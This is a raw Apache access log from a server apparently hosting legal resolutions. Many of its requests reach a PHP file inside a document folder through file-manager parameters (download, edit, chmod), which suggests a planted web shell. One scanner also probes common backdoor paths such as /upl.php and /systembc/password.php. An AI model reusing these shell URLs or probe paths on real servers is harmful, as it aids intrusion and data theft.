47.128.122.210 - - [15/Mar/2024:01:41:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.122.210 - - [15/Mar/2024:01:41:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.122.210 - - [15/Mar/2024:01:41:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.122.210 - - [15/Mar/2024:01:41:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.122.210 - - [15/Mar/2024:01:41:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.122.210 - - [15/Mar/2024:01:41:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.122.210 - - [15/Mar/2024:01:41:17 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.31.153 - - [15/Mar/2024:01:41:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2185.pdf&ft=download HTTP/1.1" 200 753318
201.245.192.253 - - [15/Mar/2024:01:41:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:40:43 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35618
47.128.28.121 - - [15/Mar/2024:01:42:04 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2988.pdf&ft=edit HTTP/1.1" 200 3107
47.128.28.121 - - [15/Mar/2024:01:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.28.121 - - [15/Mar/2024:01:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.28.121 - - [15/Mar/2024:01:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.28.121 - - [15/Mar/2024:01:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.28.121 - - [15/Mar/2024:01:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.28.121 - - [15/Mar/2024:01:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.28.121 - - [15/Mar/2024:01:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.28.121 - - [15/Mar/2024:01:42:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.28.121 - - [15/Mar/2024:01:42:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.28.121 - - [15/Mar/2024:01:42:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
201.245.192.253 - - [15/Mar/2024:01:42:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
52.167.144.203 - - [15/Mar/2024:01:43:01 -0500] "GET /BLA/resoluciones/AUTOS%202020/2894.pdf HTTP/1.1" 304 -
172.22.2.4 - - [15/Mar/2024:01:41:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [15/Mar/2024:01:43:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:43:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:43:45 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [15/Mar/2024:01:42:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53818
201.245.192.253 - - [15/Mar/2024:00:04:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
40.77.167.76 - - [15/Mar/2024:01:44:10 -0500] "GET /BLA/resoluciones/AUTOS%202022/2439.pdf HTTP/1.1" 304 -
201.245.192.253 - - [15/Mar/2024:01:44:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:45:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:46:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:47:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:48:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [15/Mar/2024:01:48:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:48:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
172.22.2.4 - - [15/Mar/2024:01:47:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:00:09:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:49:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:48:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [15/Mar/2024:01:50:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:51:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:52:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [15/Mar/2024:01:53:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:53:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:53:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [15/Mar/2024:00:14:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:01:54:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:53:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Mar/2024:01:53:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
201.245.192.253 - - [15/Mar/2024:01:55:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:56:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.136 - - [15/Mar/2024:01:56:50 -0500] "GET /BLA/resoluciones/AUTOS%202022/8524.pdf HTTP/1.1" 304 -
201.245.192.253 - - [15/Mar/2024:01:57:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:01:58:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
52.167.144.212 - - [15/Mar/2024:01:58:33 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202015/1319.pdf HTTP/1.1" 200 774441
216.245.221.92 - - [15/Mar/2024:01:58:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:01:58:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
216.244.66.195 - - [15/Mar/2024:01:58:53 -0500] "GET /robots.txt HTTP/1.1" 404 1018
201.245.192.253 - - [15/Mar/2024:00:19:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:00:19:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:01:59:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:59:13 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 20427
52.230.152.67 - - [15/Mar/2024:01:59:55 -0500] "GET /robots.txt HTTP/1.1" 404 1035
201.245.192.253 - - [15/Mar/2024:00:19:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:02:00:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:01:58:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.71 - - [15/Mar/2024:02:00:42 -0500] "GET /BLA/resoluciones/AUTOS%202020/4411.pdf HTTP/1.1" 304 -
172.22.2.4 - - [15/Mar/2024:01:59:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
201.245.192.253 - - [15/Mar/2024:00:21:29 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:02:01:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:00:21:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:02:02:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
40.77.167.19 - - [15/Mar/2024:02:03:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/2415.pdf HTTP/1.1" 304 -
216.245.221.92 - - [15/Mar/2024:02:03:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:02:03:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:03:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [15/Mar/2024:00:24:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:02:04:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:05:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:02:06:16 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
201.245.192.253 - - [15/Mar/2024:02:06:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:02:04:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [15/Mar/2024:02:05:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 48027
201.245.192.253 - - [15/Mar/2024:02:07:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:02:06:17 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 57136
201.245.192.253 - - [15/Mar/2024:02:08:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
216.245.221.92 - - [15/Mar/2024:02:08:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:02:08:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
201.245.192.253 - - [15/Mar/2024:00:29:02 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:00:29:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:02:09:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:00:29:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:02:10:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:00:31:30 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
201.245.192.253 - - [15/Mar/2024:02:11:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.37.46 - - [15/Mar/2024:02:11:51 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3152.pdf&ft=download HTTP/1.1" 200 360103
201.245.192.253 - - [15/Mar/2024:00:31:56 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 502 1154
172.22.2.4 - - [15/Mar/2024:02:10:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:02:12:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
157.55.39.61 - - [15/Mar/2024:02:12:47 -0500] "GET /portaldeninos/?s= HTTP/1.1" 200 85920
172.22.2.4 - - [15/Mar/2024:02:11:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [15/Mar/2024:02:13:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39634
216.245.221.92 - - [15/Mar/2024:02:13:38 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:02:13:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:00:34:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 502 1155
201.245.192.253 - - [15/Mar/2024:02:14:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:15:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:16:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:17:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:02:16:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:02:18:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:18:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39634
216.245.221.92 - - [15/Mar/2024:02:18:38 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [15/Mar/2024:02:17:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
201.245.192.253 - - [15/Mar/2024:02:19:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37488
201.245.192.253 - - [15/Mar/2024:02:19:30 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35617
201.245.192.253 - - [15/Mar/2024:02:19:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:19:56 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37161
201.245.192.253 - - [15/Mar/2024:02:20:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:20:39 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35617
201.245.192.253 - - [15/Mar/2024:02:21:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:22:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
47.128.40.233 - - [15/Mar/2024:02:22:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=2151.pdf HTTP/1.1" 200 2902
52.15.147.27 - - [15/Mar/2024:02:22:48 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:02:23:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39634
216.245.221.92 - - [15/Mar/2024:02:23:38 -0500] "HEAD / HTTP/1.1" 200 -
204.48.30.170 - - [15/Mar/2024:02:23:39 -0500] "\x16\x03\x01" 400 226
204.48.30.170 - - [15/Mar/2024:02:23:39 -0500] "\x16\x03\x01" 400 226
204.48.30.170 - - [15/Mar/2024:02:23:39 -0500] "GET / HTTP/1.1" 200 319
204.48.30.170 - - [15/Mar/2024:02:23:40 -0500] "GET /form.html HTTP/1.1" 404 1018
204.48.30.170 - - [15/Mar/2024:02:23:40 -0500] "GET /upl.php HTTP/1.1" 404 1018
204.48.30.170 - - [15/Mar/2024:02:23:40 -0500] "\x16\x03\x01" 400 226
204.48.30.170 - - [15/Mar/2024:02:23:40 -0500] "GET /geoip/ HTTP/1.1" 404 1018
204.48.30.170 - - [15/Mar/2024:02:23:40 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
204.48.30.170 - - [15/Mar/2024:02:23:41 -0500] "GET /1.php HTTP/1.1" 404 1018
204.48.30.170 - - [15/Mar/2024:02:23:41 -0500] "GET /bundle.js HTTP/1.1" 404 1018
204.48.30.170 - - [15/Mar/2024:02:23:41 -0500] "GET /files/ HTTP/1.1" 404 1018
204.48.30.170 - - [15/Mar/2024:02:23:41 -0500] "GET /systembc/password.php HTTP/1.1" 404 1018
204.48.30.170 - - [15/Mar/2024:02:23:41 -0500] "GET /password.php HTTP/1.1" 404 1018
201.245.192.253 - - [15/Mar/2024:02:23:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
204.48.30.170 - - [15/Mar/2024:02:23:41 -0500] "GET /info.php HTTP/1.1" 404 1018
172.22.2.4 - - [15/Mar/2024:02:22:16 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:02:24:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:02:23:07 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
201.245.192.253 - - [15/Mar/2024:02:25:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:26:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:27:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:28:23 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d60c378208792d4757a508e4811830dca4.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [15/Mar/2024:02:28:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39632
216.245.221.92 - - [15/Mar/2024:02:28:38 -0500] "HEAD / HTTP/1.1" 200 -
47.128.113.61 - - [15/Mar/2024:02:29:09 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=3402.pdf HTTP/1.1" 200 3032
47.128.113.61 - - [15/Mar/2024:02:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.113.61 - - [15/Mar/2024:02:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.113.61 - - [15/Mar/2024:02:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.113.61 - - [15/Mar/2024:02:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.113.61 - - [15/Mar/2024:02:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.113.61 - - [15/Mar/2024:02:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.113.61 - - [15/Mar/2024:02:29:10 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.113.61 - - [15/Mar/2024:02:29:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.113.61 - - [15/Mar/2024:02:29:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.113.61 - - [15/Mar/2024:02:29:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
47.128.27.119 - - [15/Mar/2024:02:29:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=0775.pdf HTTP/1.1" 200 2902
201.245.192.253 - - [15/Mar/2024:02:29:41 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d672fb2ec093aa4748bf0691d1e088fe72.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
172.22.2.4 - - [15/Mar/2024:02:28:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [15/Mar/2024:02:28:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [15/Mar/2024:02:29:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37488
201.245.192.253 - - [15/Mar/2024:02:29:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 37161
201.245.192.253 - - [15/Mar/2024:02:29:57 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35617
47.128.31.162 - - [15/Mar/2024:02:29:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5Chtdocs%5CBLA%5Cresoluciones%5CAUTOS+2021&f=1560.pdf HTTP/1.1" 200 3036
